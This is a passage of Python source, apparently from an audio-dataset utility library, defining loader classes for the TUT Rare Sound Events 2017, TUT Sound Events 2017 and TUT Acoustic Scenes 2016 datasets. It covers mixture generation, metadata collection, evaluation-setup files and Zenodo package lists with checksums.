)
# Save
ParameterContainer(mixing_params).save(filename=mixture_parameters)
# Check do we need to generate recipes
recipes_exists = True
for event_label in self.event_labels():
recipe_filename = 'mixture_recipes_' + subset_name_on_disk + '_' + event_label + '.yaml'
if not os.path.isfile(os.path.join(self.local_path, 'data', 'mixture_data',
subset_name_on_disk, param_hash, 'meta', recipe_filename)):
recipes_exists = False
if not recipes_exists:
# Generate mixture recipes
generate_mixture_recipes(
data_path=data_path,
current_subsets=numpy.array([subset_name_on_disk]),
mixing_params=mixing_params
)
# Check do we need to generate mixtures
mixture_audio_exists = True
audio_files = Path().file_list(
path=os.path.join(self.local_path, 'data', 'mixture_data', subset_name_on_disk, param_hash, 'audio'))
for event_label in self.event_labels():
event_audio = []
for f in audio_files:
if event_label in f:
event_audio.append(f)
if len(event_audio) != self.synth_parameters[subset_label]['mixtures_per_class']:
mixture_audio_exists = False
if not mixture_audio_exists:
# Generate mixture audio based on recipes
do_mixing(
data_path=data_path,
current_subsets=numpy.array([subset_name_on_disk]),
magic_anticlipping_factor=0.2,
param_hash=param_hash,
dcase_compatibility_mode=True
)
if not self.meta_container.exists():
# Collect meta data
meta_data = MetaDataContainer()
for class_label in self.event_labels():
for subset_label, subset_name_on_disk in iteritems(subset_map):
subset_name_on_disk = subset_map[subset_label]
# Get parameter hash
param_hash = self.synth_parameters[subset_label]['param_hash']
mixture_path = os.path.join(
'data',
'mixture_data',
subset_name_on_disk,
param_hash,
'audio'
)
mixture_meta_path = os.path.join(
self.local_path,
'data',
'mixture_data',
subset_name_on_disk,
param_hash,
'meta'
)
event_list_filename = os.path.join(
mixture_meta_path,
'event_list_' + subset_name_on_disk + '_' + class_label + '.csv'
)
if os.path.isfile(event_list_filename):
current_meta = MetaDataContainer(
filename=event_list_filename
).load(
fields=['filename', 'onset', 'offset', 'event_label']
)
for item in current_meta:
item.filename = os.path.join(mixture_path, item.filename)
item.scene_label = scene_label
meta_data += current_meta
# Save meta
meta_data.save(filename=self.meta_file)
# Load meta and cross validation
self.load()
# Evaluation setup filenames
train_filename = self.evaluation_setup_filename(
setup_part='train',
fold=1,
file_extension='txt'
)
test_filename = self.evaluation_setup_filename(
setup_part='test',
fold=1,
file_extension='txt'
)
evaluate_filename = self.evaluation_setup_filename(
setup_part='evaluate',
fold=1,
file_extension='txt'
)
# Check that evaluation setup exists
evaluation_setup_exists = True
if not os.path.isfile(train_filename) or not os.path.isfile(test_filename) or not os.path.isfile(evaluate_filename):
evaluation_setup_exists = False
if not evaluation_setup_exists:
# Get parameter hash
param_hash_train = self.synth_parameters['train']['param_hash']
mixture_meta_path_train = os.path.join(
self.local_path,
'data',
'mixture_data',
subset_map['train'],
param_hash_train,
'meta'
)
mixture_path_train = os.path.join(
'data',
'mixture_data',
subset_map['train'],
param_hash_train,
'audio'
)
# Get parameter hash
param_hash_test = self.synth_parameters['test']['param_hash']
mixture_meta_path_test = os.path.join(
self.local_path,
'data',
'mixture_data',
subset_map['test'],
param_hash_test,
'meta'
)
mixture_path_test = os.path.join(
'data',
'mixture_data',
subset_map['test'],
param_hash_test,
'audio'
)
train_meta = MetaDataContainer()
for class_label in self.event_labels():
event_list_filename = os.path.join(
mixture_meta_path_train,
'event_list_' + subset_map['train'] + '_' + class_label + '.csv'
)
current_meta = MetaDataContainer(
filename=event_list_filename
).load(
fields=['filename', 'onset', 'offset', 'event_label']
)
for item in current_meta:
item.filename = os.path.join(mixture_path_train, item.filename)
item.scene_label = scene_label
train_meta += current_meta
train_meta.save(filename=train_filename)
test_meta = MetaDataContainer()
for class_label in self.event_labels():
event_list_filename = os.path.join(
mixture_meta_path_test,
'event_list_' + subset_map['test'] + '_' + class_label + '.csv'
)
current_meta = MetaDataContainer(
filename=event_list_filename
).load(
fields=['filename', 'onset', 'offset', 'event_label']
)
current_meta_ = MetaDataContainer()
for item in current_meta:
item.filename = os.path.join(mixture_path_test, item.filename)
current_meta_.append(MetaDataItem(
{
'filename': item.filename,
'scene_label': scene_label
}
))
test_meta += current_meta_
test_meta.save(filename=test_filename)
eval_meta = MetaDataContainer()
for class_label in self.event_labels():
event_list_filename = os.path.join(
mixture_meta_path_test,
'event_list_' + subset_map['test'] + '_' + class_label + '.csv'
)
current_meta = MetaDataContainer(
filename=event_list_filename
).load(
fields=['filename', 'onset', 'offset', 'event_label']
)
for item in current_meta:
item.filename = os.path.join(mixture_path_test, item.filename)
item.scene_label = scene_label
eval_meta += current_meta
eval_meta.save(filename=evaluate_filename)
# Load meta and cross validation
self.load()
def evaluation_setup_filename(self, setup_part='train', fold=None, scene_label=None, file_extension='txt'):
parts = []
if setup_part == 'test' or setup_part == 'evaluate':
subset_label = 'test'
else:
subset_label = 'train'
param_hash = self.synth_parameters[subset_label]['param_hash']
if setup_part == 'train':
parts.append('train')
elif setup_part == 'test':
parts.append('test')
elif setup_part == 'evaluate':
parts.append('evaluate')
else:
message = '{name}: Unknown setup_part [{setup_part}]'.format(
name=self.__class__.__name__,
setup_part=setup_part
)
self.logger.exception(message)
raise ValueError(message)
return os.path.join(self.evaluation_setup_path, '_'.join(parts) + '_' + param_hash + '.' + file_extension)
def train(self, fold=None, scene_label=None, event_label=None, filename_contains=None, **kwargs):
"""List of training items.
Parameters
----------
fold : int
Fold id, if None all meta data is returned.
Default value "None"
scene_label : str
Scene label
Default value "None"
event_label : str
Event label
Default value "None"
filename_contains : str:
String found in filename
Default value "None"
Returns
-------
list : list of dicts
List containing all meta data assigned to training set for given fold.
"""
if fold is None or fold == 0:
fold = 'all_data'
data = self.crossvalidation_data['train'][fold]
if scene_label:
data = data.filter(scene_label=scene_label)
if event_label:
data = data.filter(event_label=event_label)
if filename_contains:
data_ = MetaDataContainer()
for item in data:
if filename_contains in item.filename:
data_.append(item)
data = data_
return data
def test(self, fold=None, scene_label=None, event_label=None, filename_contains=None, **kwargs):
"""List of testing items.
Parameters
----------
fold : int
Fold id, if None all meta data is returned.
Default value "None"
scene_label : str
Scene label
Default value "None"
event_label : str
Event label
Default value "None"
filename_contains : str:
String found in filename
Default value "None"
Returns
-------
list : list of dicts
List containing all meta data assigned to testing set for given fold.
"""
if fold is None or fold == 0:
fold = 'all_data'
data = self.crossvalidation_data['test'][fold]
if scene_label:
data = data.filter(scene_label=scene_label)
if event_label:
data = data.filter(event_label=event_label)
if filename_contains:
data_ = MetaDataContainer()
for item in data:
if filename_contains in item.filename:
data_.append(item)
data = data_
return data
def eval(self, fold=None, scene_label=None, event_label=None, filename_contains=None, **kwargs):
"""List of evaluation items.
Parameters
----------
fold : int
Fold id, if None all meta data is returned.
Default value "None"
scene_label : str
Scene label
Default value "None"
event_label : str
Event label
Default value "None"
filename_contains : str:
String found in filename
Default value "None"
Returns
-------
list : list of dicts
List containing all meta data assigned to testing set for given fold.
"""
if fold is None or fold == 0:
fold = 'all_data'
data = self.crossvalidation_data['evaluate'][fold]
if scene_label:
data = data.filter(scene_label=scene_label)
if event_label:
data = data.filter(event_label=event_label)
if filename_contains:
data_ = MetaDataContainer()
for item in data:
if filename_contains in item.filename:
data_.append(item)
data = data_
return data
class TUTRareSoundEvents_2017_EvaluationSet(SyntheticSoundEventDataset):
"""TUT Acoustic scenes 2017 evaluation dataset
This dataset is used in DCASE2017 - Task 2, Rare sound event detection
"""
def __init__(self,
storage_name='TUT-rare-sound-events-2017-evaluation',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-rare-sound-events-2017-evaluation'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['reference_data_present'] = True
kwargs['dataset_group'] = 'event'
kwargs['dataset_meta'] = {
'authors': 'Aleksandr Diment, Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Rare Sound Events 2017, evaluation dataset',
'url': None,
'audio_source': 'Synthetic',
'audio_type': 'Natural',
'recording_device_model': 'Unknown',
'microphone_model': 'Unknown',
}
kwargs['crossvalidation_folds'] = None
source_url = 'https://zenodo.org/record/1160455/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-rare-sound-events-2017-evaluation.doc.zip',
'remote_bytes': 11701,
'remote_md5': '36db98a94ce871c6bdc5bd5238383114',
'filename': 'TUT-rare-sound-events-2017-evaluation.doc.zip'
},
{
'content_type': 'documentation',
'remote_file': source_url + 'LICENSE.txt',
'remote_bytes': 0,
'remote_md5': '0707857098fc74d17beb824416fb74b1',
'filename': 'LICENSE.txt'
},
{
'content_type': 'documentation',
'remote_file': source_url + 'FREESOUNDCREDITS.txt',
'remote_bytes': 0,
'remote_md5': '3ecea52bdb0eadd6e1af52a21f735d6d',
'filename': 'FREESOUNDCREDITS.txt'
},
{
'content_type': ['audio', 'meta'],
'remote_file': source_url + 'TUT-rare-sound-events-2017-evaluation.mixture_data.1.zip',
'remote_bytes': 1071143794,
'remote_md5': 'db4aecd5175dead27ceb2692e7f28bb1',
'filename': 'TUT-rare-sound-events-2017-evaluation.mixture_data.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-evaluation.mixture_data.2.zip',
'remote_bytes': 1071773516,
'remote_md5': 'e97d5842c46805cdb94e6d4017870cde',
'filename': 'TUT-rare-sound-events-2017-evaluation.mixture_data.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-evaluation.mixture_data.3.zip',
'remote_bytes': 1073505512,
'remote_md5': '1fe20c762cecd26979e2c5303c8e9f48',
'filename': 'TUT-rare-sound-events-2017-evaluation.mixture_data.3.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-evaluation.mixture_data.4.zip',
'remote_bytes': 1071132551,
'remote_md5': '5042cd00aed9af6b37a253e24f88554f',
'filename': 'TUT-rare-sound-events-2017-evaluation.mixture_data.4.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-evaluation.mixture_data.5.zip',
'remote_bytes': 308314939,
'remote_md5': '72180597ed5bfaa73491755f74b84738',
'filename': 'TUT-rare-sound-events-2017-evaluation.mixture_data.5.zip'
}
]
kwargs['audio_paths'] = ['audio']
# Initialize base class
super(TUTRareSoundEvents_2017_EvaluationSet, self).__init__(**kwargs)
def scene_labels(self):
return ['synthetic']
def event_labels(self, scene_label=None):
"""List of unique event labels in the meta data.
Parameters
----------
Returns
-------
labels : list
List of event labels in alphabetical order.
"""
labels = ['babycry', 'glassbreak', 'gunshot']
labels.sort()
return labels
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
scene_label = 'synthetic'
subset_map = {'test': 'evaltest'}
param_hash = 'bbb81504db15a03680a0044474633b67'
# Make sure evaluation_setup directory exists
Path().makedirs(path=os.path.join(self.local_path, self.evaluation_setup_folder))
if not self.meta_container.exists() and self.reference_data_present:
# Collect meta data
meta_data = MetaDataContainer()
for class_label in self.event_labels():
for subset_label, subset_name_on_disk in iteritems(subset_map):
subset_name_on_disk = subset_map[subset_label]
mixture_path = os.path.join(
'data',
'mixture_data',
subset_name_on_disk,
param_hash,
'audio'
)
mixture_meta_path = os.path.join(
self.local_path,
'data',
'mixture_data',
subset_name_on_disk,
param_hash,
'meta'
)
event_list_filename = os.path.join(
mixture_meta_path,
'event_list_' + subset_name_on_disk + '_' + class_label + '.csv'
)
if os.path.isfile(event_list_filename):
current_meta = MetaDataContainer(
filename=event_list_filename
).load(
fields=['filename', 'onset', 'offset', 'event_label']
)
for item in current_meta:
item.filename = os.path.join(mixture_path, item.filename)
item.scene_label = scene_label
meta_data += current_meta
# Save meta
meta_data.save(filename=self.meta_file)
test_filename = self.evaluation_setup_filename(
setup_part='test',
fold=None,
file_extension='txt'
)
evaluate_filename = self.evaluation_setup_filename(
setup_part='evaluate',
fold=None,
file_extension='txt'
)
# Check that evaluation setup exists
evaluation_setup_exists = True
if not os.path.isfile(test_filename) or not os.path.isfile(evaluate_filename):
evaluation_setup_exists = False
if not evaluation_setup_exists:
# Get parameter hash
mixture_meta_path_test = os.path.join(
self.local_path,
'data',
'mixture_data',
subset_map['test'],
param_hash,
'meta'
)
mixture_path_test = os.path.join(
'data',
'mixture_data',
subset_map['test'],
param_hash,
'audio'
)
test_meta = MetaDataContainer()
for class_label in self.event_labels():
event_list_filename = os.path.join(
mixture_meta_path_test,
'event_list_' + subset_map['test'] + '_' + class_label + '.csv'
)
current_meta = MetaDataContainer(
filename=event_list_filename
).load(
fields=['filename', 'onset', 'offset', 'event_label']
)
current_meta_ = MetaDataContainer()
for item in current_meta:
item.filename = os.path.join(mixture_path_test, item.filename)
current_meta_.append(MetaDataItem(
{
'filename': item.filename,
'scene_label': scene_label
}
))
test_meta += current_meta_
test_meta.save(filename=test_filename)
eval_meta = MetaDataContainer()
for class_label in self.event_labels():
event_list_filename = os.path.join(
mixture_meta_path_test,
'event_list_' + subset_map['test'] + '_' + class_label + '.csv'
)
current_meta = MetaDataContainer(
filename=event_list_filename
).load(
fields=['filename', 'onset', 'offset', 'event_label']
)
for item in current_meta:
item.filename = os.path.join(mixture_path_test, item.filename)
item.scene_label = scene_label
eval_meta += current_meta
eval_meta.save(filename=evaluate_filename)
# Load meta and cross validation
self.load()
return self
def evaluation_setup_filename(self, setup_part='train', fold=None, scene_label=None, file_extension='txt'):
parts = []
if setup_part == 'test' or setup_part == 'evaluate':
subset_label = 'test'
else:
subset_label = 'train'
if setup_part == 'train':
parts.append('train')
elif setup_part == 'test':
parts.append('test')
elif setup_part == 'evaluate':
parts.append('evaluate')
else:
message = '{name}: Unknown setup_part [{setup_part}]'.format(
name=self.__class__.__name__,
setup_part=setup_part
)
self.logger.exception(message)
raise ValueError(message)
return os.path.join(self.evaluation_setup_path, '_'.join(parts) + '.' + file_extension)
def train(self, fold=None, scene_label=None, event_label=None, filename_contains=None, **kwargs):
"""List of training items.
Parameters
----------
fold : int
Fold id, if None all meta data is returned.
Default value None
scene_label : str
Scene label
Default value None"
event_label : str
Event label
Default value None"
filename_contains : str:
String found in filename
Default value None
Returns
-------
list
List containing all meta data assigned to training set for given fold.
"""
if fold is None or fold == 0:
fold = 'all_data'
data = self.crossvalidation_data['train'][fold]
if scene_label:
data = data.filter(scene_label=scene_label)
if event_label:
data = data.filter(event_label=event_label)
if filename_contains:
data_ = MetaDataContainer()
for item in data:
if filename_contains in item.filename:
data_.append(item)
data = data_
return data
def test(self, fold=None, scene_label=None, event_label=None, filename_contains=None, **kwargs):
"""List of testing items.
Parameters
----------
fold : int
Fold id, if None all meta data is returned.
Default value None
scene_label : str
Scene label
Default value None
event_label : str
Event label
Default value None
filename_contains : str:
String found in filename
Default value None
Returns
-------
list
List containing all meta data assigned to testing set for given fold.
"""
if fold is None or fold == 0:
fold = 'all_data'
data = self.crossvalidation_data['test'][fold]
if scene_label:
data = data.filter(scene_label=scene_label)
if event_label:
data = data.filter(event_label=event_label)
if filename_contains:
data_ = MetaDataContainer()
for item in data:
if filename_contains in item.filename:
data_.append(item)
data = data_
return data
def eval(self, fold=None, scene_label=None, event_label=None, filename_contains=None, **kwargs):
"""List of evaluation items.
Parameters
----------
fold : int
Fold id, if None all meta data is returned.
Default value None
scene_label : str
Scene label
Default value None
event_label : str
Event label
Default value None
filename_contains : str:
String found in filename
Default value None
Returns
-------
list
List containing all meta data assigned to testing set for given fold.
"""
if fold is None or fold == 0:
fold = 'all_data'
data = self.crossvalidation_data['evaluate'][fold]
if scene_label:
data = data.filter(scene_label=scene_label)
if event_label:
data = data.filter(event_label=event_label)
if filename_contains:
data_ = MetaDataContainer()
for item in data:
if filename_contains in item.filename:
data_.append(item)
data = data_
return data
class TUTSoundEvents_2017_DevelopmentSet(SoundEventDataset):
"""TUT Sound events 2017 development dataset
This dataset is used in DCASE2017 - Task 3, Sound event detection in real life audio
"""
def __init__(self,
storage_name='TUT-sound-events-2017-development',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-sound-events-2017-development'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'event'
kwargs['dataset_meta'] = {
'authors': 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Sound Events 2016, development dataset',
'url': 'https://zenodo.org/record/45759',
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Roland Edirol R-09',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = 4
source_url = 'https://zenodo.org/record/814831/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-sound-events-2017-development.doc.zip',
'remote_bytes': 56150,
'remote_md': 'aa6024e70f5bff3fe15d962b01753e23',
'filename': 'TUT-sound-events-2017-development.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-sound-events-2017-development.meta.zip',
'remote_bytes': 140684,
'remote_md': '50e870b3a89ed3452e2a35b508840929',
'filename': 'TUT-sound-events-2017-development.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-sound-events-2017-development.audio.1.zip',
'remote_bytes': 1062653169,
'remote_md': '6f1cd31592b8240a14be3ee513db6a23',
'filename': 'TUT-sound-events-2017-development.audio.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-sound-events-2017-development.audio.2.zip',
'remote_bytes': 213232458,
'remote_md': 'adcff03341b84dc8d35f035b93c1efa0',
'filename': 'TUT-sound-events-2017-development.audio.2.zip'
}
]
kwargs['audio_paths'] = [os.path.join('audio', 'street')]
super(TUTSoundEvents_2017_DevelopmentSet, self).__init__(**kwargs)
def process_meta_item(self, item, absolute_path=True, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
raw_path, raw_filename = os.path.split(item.filename)
item.identifier = raw_filename.split('_')[0]
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
meta_data = MetaDataContainer()
annotation_files = Path().file_list(path=os.path.join(self.local_path, 'meta'), extensions=['ann'])
for annotation_filename in annotation_files:
data = MetaDataContainer(filename=annotation_filename).load()
for item in data:
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data += data
# Save meta
meta_data.save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
class TUTSoundEvents_2017_EvaluationSet(SoundEventDataset):
"""TUT Sound events 2017 evaluation dataset
This dataset is used in DCASE2017 - Task 3, Sound event detection in real life audio
"""
def __init__(self,
storage_name='TUT-sound-events-2017-evaluation',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-sound-events-2017-evaluation'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'event'
kwargs['dataset_meta'] = {
'authors': 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Sound Events 2016, development dataset',
'url': 'https://zenodo.org/record/45759',
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Roland Edirol R-09',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = None
source_url = 'https://zenodo.org/record/1040179/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-sound-events-2017-evaluation.doc.zip',
'remote_bytes': 54606,
'remote_md5': '8bbf41671949edee15d6cdc3f9e726c9',
'filename': 'TUT-sound-events-2017-evaluation.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-sound-events-2017-evaluation.meta.zip',
'remote_bytes': 762,
'remote_md5': 'a951598abaea87296ca409e30fb0b379',
'filename': 'TUT-sound-events-2017-evaluation.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-sound-events-2017-evaluation.audio.zip',
'remote_bytes': 388173790,
'remote_md5': '1d3aa81896be0f142130ca9ca7a2b871',
'filename': 'TUT-sound-events-2017-evaluation.audio.zip'
}
]
kwargs['audio_paths'] = ['audio']
super(TUTSoundEvents_2017_EvaluationSet, self).__init__(**kwargs)
def scene_labels(self):
labels = ['street']
labels.sort()
return labels
def process_meta_item(self, item, absolute_path=True, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
raw_path, raw_filename = os.path.split(item.filename)
item.identifier = os.path.splitext(raw_filename)[0]
item.source_label = 'mixture'
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
evaluate_filename = self.evaluation_setup_filename(
setup_part='evaluate',
scene_label=self.scene_labels()[0]
)
eval_file = MetaDataContainer(filename=evaluate_filename)
if eval_file.exists():
# Get meta data from evaluation file
meta_data = MetaDataContainer()
eval_file.load()
for item in eval_file:
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data += eval_file
# Save meta
meta_data.save(filename=self.meta_file)
# Load meta and cross validation
self.load()
elif os.path.isdir(os.path.join(self.local_path, 'meta')):
annotation_files = Path().file_list(path=os.path.join(self.local_path, 'meta'), extensions=['ann'])
# Get meta data from annotation files
meta_data = MetaDataContainer()
for annotation_filename in annotation_files:
data = MetaDataContainer(filename=annotation_filename).load()
for item in data:
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data += data
# Save meta
meta_data.save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
# =====================================================
# DCASE 2016
# =====================================================
class TUTAcousticScenes_2016_DevelopmentSet(AcousticSceneDataset):
"""TUT Acoustic scenes 2016 development dataset
This dataset is used in DCASE2016 - Task 1, Acoustic scene classification
"""
def __init__(self,
storage_name='TUT-acoustic-scenes-2016-development',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-acoustic-scenes-2016-development'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'scene'
kwargs['dataset_meta'] = {
'authors': 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Acoustic Scenes 2016, development dataset',
'url': 'https://zenodo.org/record/45739',
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Roland Edirol R-09',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = 4
source_url = 'https://zenodo.org/record/45739/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.doc.zip',
'remote_bytes': 69671,
'remote_md5': 'f94ad46eb36325d9fbce5d60f7fc9926',
'filename': 'TUT-acoustic-scenes-2016-development.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.meta.zip',
'remote_bytes': 28815,
'remote_md5': '779b33da2ebbf8bde494b3c981827251',
'filename': 'TUT-acoustic-scenes-2016-development.meta.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.error.zip',
'remote_bytes': 1283,
'remote_md5': 'a0d3e0d81b0a36ece87d0f3a9124a386',
'filename': 'TUT-acoustic-scenes-2016-development.error.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.audio.1.zip',
'remote_bytes': 1070981236,
'remote_md5': 'e39546e65f2e72517b6335aaf0c8323d',
'filename': 'TUT-acoustic-scenes-2016-development.audio.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.audio.2.zip',
'remote_bytes': 1067186166,
'remote_md5': 'd36cf3253e2c041f68e937a3fe804807',
'filename': 'TUT-acoustic-scenes-2016-development.audio.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.audio.3.zip',
'remote_bytes': 1073644405,
'remote_md5': '0393a9620ab882b1c26d884eccdcffdd',
'filename': 'TUT-acoustic-scenes-2016-development.audio.3.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.audio.4.zip',
'remote_bytes': 1072111347,
'remote_md5': 'fb3e4e0cd7ea82120ec07031dee558ce',
'filename': 'TUT-acoustic-scenes-2016-development.audio.4.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.audio.5.zip',
'remote_bytes': 1069681513,
'remote_md5': 'a19cf600b33c8f88f6ad607bafd74057',
'filename': 'TUT-acoustic-scenes-2016-development.audio.5.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.audio.6.zip',
'remote_bytes': 1072890150,
'remote_md5': '591aad3219d1155342572cc1f6af5680',
'filename': 'TUT-acoustic-scenes-2016-development.audio.6.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.audio.7.zip',
'remote_bytes': 1069265197,
'remote_md5': '9e6c1897789e6bce13ac69c6caedb7ab',
'filename': 'TUT-acoustic-scenes-2016-development.audio.7.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-development.audio.8.zip',
'remote_bytes': 528461098,
'remote_md5': 'c4718354f48fcc9dfc7305f6cd8325c8',
'filename': 'TUT-acoustic-scenes-2016-development.audio.8.zip'
}
]
kwargs['audio_paths'] = [
'audio'
]
super(TUTAcousticScenes_2016_DevelopmentSet, self).__init__(**kwargs)
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
meta_data = {}
for fold in range(1, self.crossvalidation_folds):
# Read train files in
fold_data = MetaDataContainer(
filename=self.evaluation_setup_filename(setup_part='train', fold=fold)
).load()
# Read eval files in
fold_data += MetaDataContainer(
filename=self.evaluation_setup_filename(setup_part='evaluate', fold=fold)
).load()
for item in fold_data:
if item.filename not in meta_data:
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data[item.filename] = item
# Save meta
MetaDataContainer(list(meta_data.values())).save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
def process_meta_item(self, item, absolute_path=True, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
raw_path, raw_filename = os.path.split(item.filename)
item.identifier = raw_filename.split('_')[0]
class TUTAcousticScenes_2016_EvaluationSet(AcousticSceneDataset):
"""TUT Acoustic scenes 2016 evaluation dataset
This dataset is used in DCASE2016 - Task 1, Acoustic scene classification
"""
def __init__(self,
storage_name='TUT-acoustic-scenes-2016-evaluation',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-acoustic-scenes-2016-evaluation'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'scene'
kwargs['dataset_meta'] = {
'authors': 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Acoustic Scenes 2016, evaluation dataset',
'url': 'https://zenodo.org/record/165995',
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Roland Edirol R-09',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = None
source_url = 'https://zenodo.org/record/165995/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
